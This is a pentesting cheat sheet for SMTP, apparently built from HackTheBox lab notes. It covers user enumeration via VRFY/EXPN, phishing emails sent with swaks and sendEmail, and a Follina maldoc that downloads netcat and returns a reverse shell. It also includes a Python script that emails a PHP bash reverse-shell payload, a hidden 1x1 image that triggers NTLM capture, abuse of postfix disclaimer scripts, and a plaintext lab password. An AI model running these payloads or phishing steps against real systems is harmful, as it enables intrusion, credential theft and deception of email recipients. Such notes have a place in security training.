25, 465, 587 - SMTP(S)
Last updated
Was this helpful?
Last updated
Was this helpful?
Was this helpful?
An alternative if you need to check another users inbox and/or sent emails. Need creds!
Contains scripts to be executed if condition is met.
Analyzing the last line means /etc/postfix/disclaimer will be executed if a new mail is received from user john.
Edit disclaimer-file to execute whatever bash commands you'd like and send an email to trigger it.
In the real world, it's unlikely you can just jump onto the console of a machine as a privileged user and authenticate to your malicious SMB server. Nor can you do NTLM authentication on demand, but there are lots of techniquest to "force" the user to do it unknowingly.
1x1 Images in Emails:
A sneaky way would be to modify the email signature, so that even legitimate emails send will trigger NTLM authentication from every recipient who reads them.
// SMTP
nc -vn <IP> 25
// SMTPS
openssl s_client -crlf -connect smtp.mailgun.org:465 #SSL/TLS without starttls command
openssl s_client -starttls smtp -crlf -connect smtp.mailgun.org:587dig +short mx google.com$ telnet example.com 587
220 example.com SMTP Server Banner
>> HELO
250 example.com Hello [x.x.x.x]
>> AUTH NTLM 334
NTLM supported
>> TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA=
334 TlRMTVNTUAACAAAACgAKADgAAAAFgooCBqqVKFrKPCMAAAAAAAAAAEgASABCAAAABgOAJQAAAA9JAEkAUwAwADEAAgAKAEkASQBTADAAMQABAAoASQBJAFMAMAAxAAQACgBJAEkAUwAwADEAAwAKAEkASQBTADAAMQAHAAgAHwMI0VPy1QEAAAAA$ telnet 10.0.10.1 25
220 myhost ESMTP Sendmail 8.9.3
HELO x
250 myhost Hello [10.0.0.99], pleased to meet you
MAIL FROM:test@test.org
250 2.1.0 test@test.org... Sender ok
// RCPT TO
RCPT TO:test
550 5.1.1 test... User unknown
RCPT TO:admin
550 5.1.1 admin... User unknown
RCPT TO:ed
250 2.1.5 ed... Recipient ok
// VRFY
VRFY root
250 Super-User <root@myhost>
VRFY blah
550 blah... User unknown
// EXPN
EXPN test
550 5.1.1 test... User unknown
EXPN root
250 2.1.5 <ed.williams@myhost>
EXPN sshd
250 2.1.5 sshd privsep <sshd@mail2>// Install & Configure
$ apt install mailutils postfix
$ sudo postconf -e "mydestination = $myhostname, void, localhost.localdomain, localhost"
$ sudo postconf -e "mynetworks = 127.0.0.0/8, 10.10.14.0/24"
$ sudo postconf -e "inet_interfaces = all"
$ sudo postconf -e "inet_protocols = ipv4"
$ sudo postconf -e "recipient_delimiter = +"
$ sudo postconf -e "lmtp_host_lookup = native"
$ sudo postconf -e "smtp_host_lookup = native"
$ service postfix restart
// Send mail
$ telnet localhost 25
220 void.xxxxx.se ESMTP Postfix (Debian/GNU)
ehlo localhost
250-void.xxxxx.se
250-PIPELINING
250-SIZE 10240000
250-VRFY
250-ETRN
250-STARTTLS
250-ENHANCEDSTATUSCODES
250-8BITMIME
250-DSN
250-SMTPUTF8
250 CHUNKING
mail from: void@void
250 2.1.0 Ok
rcpt to: itsupport@outdated.htb
250 2.1.5 Ok
data
354 End data with <CR><LF>.<CR><LF>
Subject: Phishing
http://10.10.14.6:8080
.
250 2.0.0 Ok: queued as 0C51812101C
quit
221 2.0.0 Bye
// Verify that status=sent
$ cat /var/log/mail.log
[... snip ...]
Aug 15 10:51:28 void postfix/smtp[7917]: 0C51812101C: to=<itsupport@outdated.htb>, relay=outdated.htb[10.10.11.175]:25, delay=54, delays=43/0.01/0.08/11, dsn=2.0.0, status=sent (250 Queued (10.432 seconds))$ swaks --to itsupport@outdated.htb --from 0xpthree@exploit.se --server mail.outdated.htb --body "http://10.10.14.6/pwn.html"
=== Trying mail.outdated.htb:25...
=== Connected to mail.outdated.htb.
<- 220 mail.outdated.htb ESMTP
-> EHLO void
<- 250-mail.outdated.htb
<- 250-SIZE 20480000
<- 250-AUTH LOGIN
<- 250 HELP
-> MAIL FROM:<0xpthree@exploit.se>
<- 250 OK
-> RCPT TO:<itsupport@outdated.htb>
<- 250 OK
-> DATA
<- 354 OK, send.
-> Date: Mon, 15 Aug 2022 15:14:51 +0200
-> To: itsupport@outdated.htb
-> From: 0xpthree@exploit.se
-> Subject: test Mon, 15 Aug 2022 15:14:51 +0200
-> Message-Id: <20220815151451.031141@void>
-> X-Mailer: swaks v20201014.0 jetmore.org/john/code/swaks/
->
-> http://10.10.14.6/pwn.html
->
->
-> .
<- 250 Queued (10.406 seconds)
-> QUIT
<- 221 goodbye// Script used: https://github.com/JohnHammond/msdt-follina
//
// follina.py row 111:
// command = f"""Invoke-WebRequest http://10.10.14.2:4444/nc64.exe -OutFile C:\\Windows\\Tasks\\nc.exe; C:\\Windows\\Tasks\\nc.exe -e cmd.exe {serve_host} {args.reverse}"""
$ ls -al /tmp/67gup9zc/www
total 64
drwxr-xr-x 2 void void 4096 Aug 19 13:04 .
drwxr-xr-x 4 void void 4096 Aug 19 12:54 ..
-rw-r--r-- 1 void void 4689 Aug 19 12:54 index.html
-rwxr-xr-x 1 void void 45272 Aug 19 13:04 nc64.exe
$ sendEmail -t itsupport@outdated.htb -f 0xpthree@exploit.se -s mail.outdated.htb -u PleaseWork -m 'http://10.10.14.2/'
Aug 19 12:54:31 void sendEmail[17349]: Email was sent successfully!
$ python3 follina.py -i tun0 -p 80 -r 4444
[+] copied staging doc /tmp/67gup9zc
[+] created maldoc ./follina.doc
[+] serving html payload on :80
[+] starting 'nc -lvnp 4444'
listening on [any] 4444 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.11.175] 49822
Microsoft Windows [Version 10.0.19043.928]
(c) Microsoft Corporation. All rights reserved.
C:\Users\btables\AppData\Local\Temp\SDIAG_9fb3a047-99c4-4779-8d48-a154f6f5936e> whoami
outdated\btablesDownload and install the email client thunderbird. Upon first start enter the following:
Your name: Paul Byrd
Email Address: paulbyrd@sneakymailer.htb
Password: ^(#J@SkFv2[%KhIxKk(Ju`hqcHl<:Ht
Press 'Continue'. It will fail to find the server, change to following:
INCOMING
Protocol: IMAP
Server Hostname: sneakymailer.htb
Port: 143
SSL: None
Authentication: Normal Password
OUTGOING
Protocol: SMTP
Server Hostname: sneakymailer.htb
Port: 25
SSL: None
Authentication: Normal Password
Press 'Done', check 'I understand the risks' and then 'Done'. Restart thunderbird and you'll be connected to Paul Byrd's email.from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
import smtplib
import sys
lhost = "127.0.0.1"
lport = 443
rhost = "192.168.1.1"
rport = 25 # 489,587
# create message object instance
msg = MIMEMultipart()
# setup the parameters of the message
password = ""
msg['From'] = "attacker@local"
msg['To'] = "victim@local"
msg['Subject'] = "This is not a drill!"
# payload
message = ("<?php system('bash -i >& /dev/tcp/%s/%d 0>&1'); ?>" % (lhost,lport))
print("[*] Payload is generated : %s" % message)
msg.attach(MIMEText(message, 'plain'))
server = smtplib.SMTP(host=rhost,port=rport)
if server.noop()[0] != 250:
print("[-]Connection Error")
exit()
server.starttls()
# Uncomment if log-in with authencation
# server.login(msg['From'], password)
server.sendmail(msg['From'], msg['To'], msg.as_string())
server.quit()
print("[***]successfully sent email to %s:" % (msg['To']))sendmail.cf
submit.cf
/etc/postfix/master.cf
C:\Nuxeo\conf\Catalina\localhost\nuxeo.xml$ cat /etc/postfix/master.cf
flags=DRhu user=vmail argv=/usr/bin/maildrop -d ${recipient}
# user=cyrus argv=/cyrus/bin/deliver -e -r ${sender} -m ${extension} ${user}
# flags=R user=cyrus argv=/cyrus/bin/deliver -e -m ${extension} ${user}
flags=Fqhu user=uucp argv=uux -r -n -z -a$sender - $nexthop!rmail ($recipient)
flags=F user=ftn argv=/usr/lib/ifmail/ifmail -r $nexthop ($recipient)
flags=Fq. user=bsmtp argv=/usr/lib/bsmtp/bsmtp -t$nexthop -f$sender $recipient
flags=R user=scalemail argv=/usr/lib/scalemail/bin/scalemail-store ${nexthop} ${user} ${extension}
flags=FR user=list argv=/usr/lib/mailman/bin/postfix-to-mailman.py
flags=Rq user=john argv=/etc/postfix/disclaimer -f ${sender} -- ${recipient}$ ls -al | grep discl
-rwxrwxr-x 1 root filter 1022 Sep 10 13:44 disclaimer<img src="\\10.10.17.231\test.ico" height="1" width="1" />kyle@writer:/etc/postfix$ nc localhost 25
220 writer.htb ESMTP Postfix (Ubuntu)
HELO writer.htb
250 writer.htb
MAIL FROM:<kyle@writer.htb>
250